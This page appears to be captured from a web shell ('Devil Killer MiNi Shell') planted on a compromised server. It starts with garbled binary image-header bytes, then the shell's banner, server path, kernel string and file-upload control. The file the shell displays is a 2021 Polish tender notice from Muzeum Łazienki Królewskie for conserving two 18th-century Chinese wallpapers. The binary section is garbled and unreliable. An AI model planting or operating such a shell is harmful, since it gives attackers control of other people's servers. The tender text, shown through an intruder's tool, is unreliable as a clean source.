JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210602/0007225401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072254 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja i Restauracja dwóch XVIII-wiecznych tapet chińskich z dekoracją malarską J.B. Plerscha w Pokoju Kompanii w Białym Domu na terenie MŁK wraz z wykonaniem dokumentacji konserwatorskiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Łazienki Królewskie w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 369111140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Agrykola 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48225060024</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48225060174</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lazienki-krolewskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lazienki-krolewskie.pl/pl/bip</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Instytucja Kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja i Restauracja dwóch XVIII-wiecznych tapet chińskich z dekoracją malarską J.B. Plerscha w Pokoju Kompanii w Białym Domu na terenie MŁK wraz z wykonaniem dokumentacji konserwatorskiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5cdeb167-c25c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072254</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005537/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Konserwacja i restauracja 2 tapet chińskich z XVIII w. z dekoracją malarską J.B.Plerscha (dekoracja ścienna wnętrza Pokoju Kompanii w Białym Domu), z oprcowaniem dokumentacji konserwatroskiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lazienki-krolewskie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://lazienki-krolewskie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I.	Informacja o środkach komunikacji elektronicznej, przy użyciu których Zamawiającego będzie komunikował się z Wykonawcami <br/><br/>1.	W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	Pytania do SWZ należy zadawać za pośrednictwem systemu dostępnego pod adresem https://lazienki-krolewskie.ezamawiajacy.pl, zwanego dalej „Systemem” lub „Platformą”. Instrukcja korzystania z Systemu jest dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i procedury procesu zakupowego”.<br/>3.	Niezbędne wymagania sprzętowo-aplikacyjne do przekazania danych dotyczące systemu https://lazienki-krolewskie.ezamawiajacy.pl:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s na komputer;<br/>2)	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>3)	zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>4)	włączona obsługa JavaScript;<br/>5)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>4.	Format kodowania i oznaczania czasu:<br/>1)	plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero <br/>po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>2)	oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>5.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Patrz Rozdział XXIX SWZ - KLAUZULA INFORMACYJNA Z ART. 13 i ART. 14 RODO W CELU ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz Rozdział XXIX SWZ - KLAUZULA INFORMACYJNA Z ART. 13 i ART. 14 RODO W CELU ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">11/2021/PZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest konserwacja i Restauracja dwóch XVIII-wiecznych tapet chińskich z dekoracją malarską Jana Bogumiła Plerscha stanowiących dekorację ścienną wnętrza Pokoju Kompanii w Białym Domu na terenie Muzeum Łazienki Królewskie w Warszawie wraz <br/>z wykonaniem dokumentacji konserwatorskiej.<br/>2.	Szczegółowy opis przedmiotu zamówienia zawiera Opis Przedmiotu Zamówienia stanowiący Załącznik nr 9a do SWZ oraz Dokumentacja techniczna, stanowiąca Załącznik nr 9b, 9c, 9d, 9e, 9f, 9g, 9h i 9i do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92522200-8 - Usługi ochrony budynków historycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">92312000-1 - Usługi artystyczne</p> <p class="mb-0">92520000-2 - Usługi świadczone przez muzea i w zakresie ochrony obiektów i budynków zabytkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">147 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1)	Kryterium I – Cena – waga 60%<br/>Ocenianym ofertom, zostaną przyznane punkty według następującego wzoru:<br/><br/><br/>najniższa cena brutto pośród złożonych ważnych ofert<br/>Cena = ------------------------------------------------------------------------------------------ x 60 pkt<br/>cena brutto badanej oferty<br/><br/><br/>Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert jakim jest „Cena brutto” wynosi – 60 pkt.<br/><br/>2)	Kryterium II – Długość gwarancji i rękojmi – waga 40%<br/><br/>a)	okresu gwarancji i rękojmi 36 miesięcy - 0 punktów;<br/>b)	okresu gwarancji i rękojmi 42 miesięcy - 10 punktów;<br/>c)	okresu gwarancji i rękojmi 48 miesięcy - 20 punktów;<br/>d)	okresu gwarancji i rękojmi 54 miesięcy - 30 punktów;<br/>e)	okresu gwarancji i rękojmi 60 miesiące - 40 punktów;<br/><br/>W razie niewpisania okresu gwarancji i rękojmi Zamawiający przyjmie, że Wykonawca zaoferował minimalną gwarancję zgodną z SWZ i w ramach niniejszego kryterium przyzna 0 punktów. W razie podania dłuższego okresu gwarancji niż 60 miesięcy Zamawiający przyzna Wykonawcy maksymalną ilość punktów w tym kryterium – 40 pkt. <br/><br/>2.	Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością <br/>do dwóch miejsc po przecinku, przy wykorzystaniu matematycznych zasad zaokrąglania.<br/>3.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione <br/>w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>Ko = C + G<br/>gdzie:<br/>Ko – końcowa ocena oferty<br/>C – ocena punktowa uzyskana w kryterium „Cena brutto”,<br/>G – ocena punktowa uzyskana w kryterium „Długość gwarancji i rękojmi”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>o ile wynika to z odrębnych przepisów - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>c)	sytuacji ekonomicznej lub finansowej - Zamawiający uzna za spełniony warunek <br/>w tym zakresie jeżeli Wykonawca wykaże, że:<br/>i.	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną na nie mniej niż 500.000,00 zł (słownie: dwieście tysięcy złotych 00/100).<br/>d)	zdolności technicznej lub zawodowej - Zamawiający uzna za spełniony warunek <br/>w tym zakresie, jeżeli Wykonawca wykaże, że:<br/><br/>i.	w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował należycie minimum pięć usług polegających na konserwacji i restauracji obiektów malarstwa ściennego, wpisanych do rejestru zabytków (w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami <br/>Dz. U. z 2020 r., poz. 282 ze zm.) lub wpisanych do inwentarza muzeum będącego instytucją kultury lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu na miejsce położenia zabytku, za minimum 50.000,00 zł netto (słownie: czterdzieści tysięcy złotych netto) każda, w tym <br/>co najmniej dwie usługi muszą dotyczyć obiektów pochodzących z XVIII wieku, <br/>oraz<br/>ii.	w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował należycie minimum pięć usług polegających na konserwacji i restauracji obiektów <br/>na podłożu papierowym, wpisanych do rejestru zabytków (w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami) lub wpisanych do inwentarza muzeum będącego instytucją kultury lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu na miejsce położenia zabytku, za minimum 20.000,00 zł netto (słownie: dwadzieścia tysięcy złotych netto) każda, w tym co najmniej dwie usługi muszą dotyczyć obiektów pochodzących z XVII, XVIII lub XIX wieku, <br/><br/>W przypadku składania wspólnej oferty warunek określony w punkcie c) i d) ppkt i) –ii) powyżej uznaje się za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia go spełnia.<br/><br/>W przypadku, gdy wartość wykazywanych umów (zamówień) jest określona w innej walucie niż złoty polski, Zamawiający dokona przeliczenia tej wartości na złoty polski na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich NBP z dnia publikacji ogłoszenia o zamówieniu.<br/><br/>iii.	dysponuje lub będzie dysponować co najmniej 4 osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych <br/>do prawidłowej realizacji zamówienia, tj.:<br/><br/>A.	co najmniej jedną osobą, pełniąca funkcje kierownika zespołu konserwatorskiego, posiadającą uprawnienia konserwatorskie <br/>w dziedzinie konserwacji i restauracji malarstwa, potwierdzone dyplomem ukończenia studiów w wyżej wymienionej specjalizacji, z co najmniej <br/>15-letnią potwierdzoną praktyką zawodową, w tym w zakresie konserwacji malarstwa ściennego (minimum pięć realizacji przy zabytkach wpisanych <br/>do rejestru zabytków (w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami Dz. U. z 2020 r., poz. 282 ze zm.) lub wpisanych do inwentarza muzeum będącego instytucją kultury lub – <br/>w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu <br/>na miejsce położenia zabytku, w tym minimum 3 realizacje przy XVIII wiecznych polichromiach ściennych)<br/>oraz<br/>B.	co najmniej dwoma osobami pełniącymi funkcje członka zespołu konserwatorskiego, posiadającymi uprawnienia konserwatorskie <br/>w dziedzinie konserwacji i restauracji malarstwa, potwierdzone dyplomem ukończenia studiów w wyżej wymienionej specjalizacji z co najmniej <br/>10-letnią praktyką zawodową, w tym potwierdzone doświadczenie <br/>w zakresie konserwacji malarstwa ściennego (minimum trzy realizacje) <br/>i kwalifikacjami zgodnie z obowiązującymi przepisami prawa tj. art. 37a ustawy z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (tj. Dz. U. z 2020 r., poz. 282 ze zm.) <br/><br/>C.	co najmniej jedną osobą pełniąca funkcje członka zespołu konserwatorskiego, posiadającą uprawnienia konserwatorskie <br/>w dziedzinie konserwacji i restauracji papieru, potwierdzone dyplomem ukończenia studiów w wyżej wymienionej specjalizacji, z co najmniej <br/>10 -letnią praktyką zawodową (minimum pięć realizacji przy zabytkach wpisanych do rejestru zabytków (w rozumieniu przepisów ustawy z dnia <br/>23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami Dz. U. z 2020 r., poz. 282 ze zm.) lub wpisanych do inwentarza muzeum będącego instytucją kultury lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących <br/>ze względu na miejsce położenia zabytku, w tym minimum dwie realizacje muszą dotyczyć obiektów pochodzących z XVII, XVIII lub XIX wieku)<br/><br/>Zamawiający nie dopuszcza łączenia ww. funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy, Wykonawca składa następujące podmiotowe środki dowodowe<br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie <br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie <br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 10 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających, czy te usługi wykonane należycie, <br/>w szczególności informacji o tym czy usługi zostały wykonane zgodnie z przepisami prawa <br/>i wszelkimi obowiązującymi normami, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - -– załącznik nr 4 do SWZ;<br/>2)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami -– załącznik nr 5 do SWZ;<br/>3)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, <br/>że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500.000,00 zł.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.	Do oferty należy dołączyć:<br/>1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, <br/>że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>2)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnienia warunków udziału w postępowaniu wzór oświadczenia stanowi Załącznik nr 3a i 3b 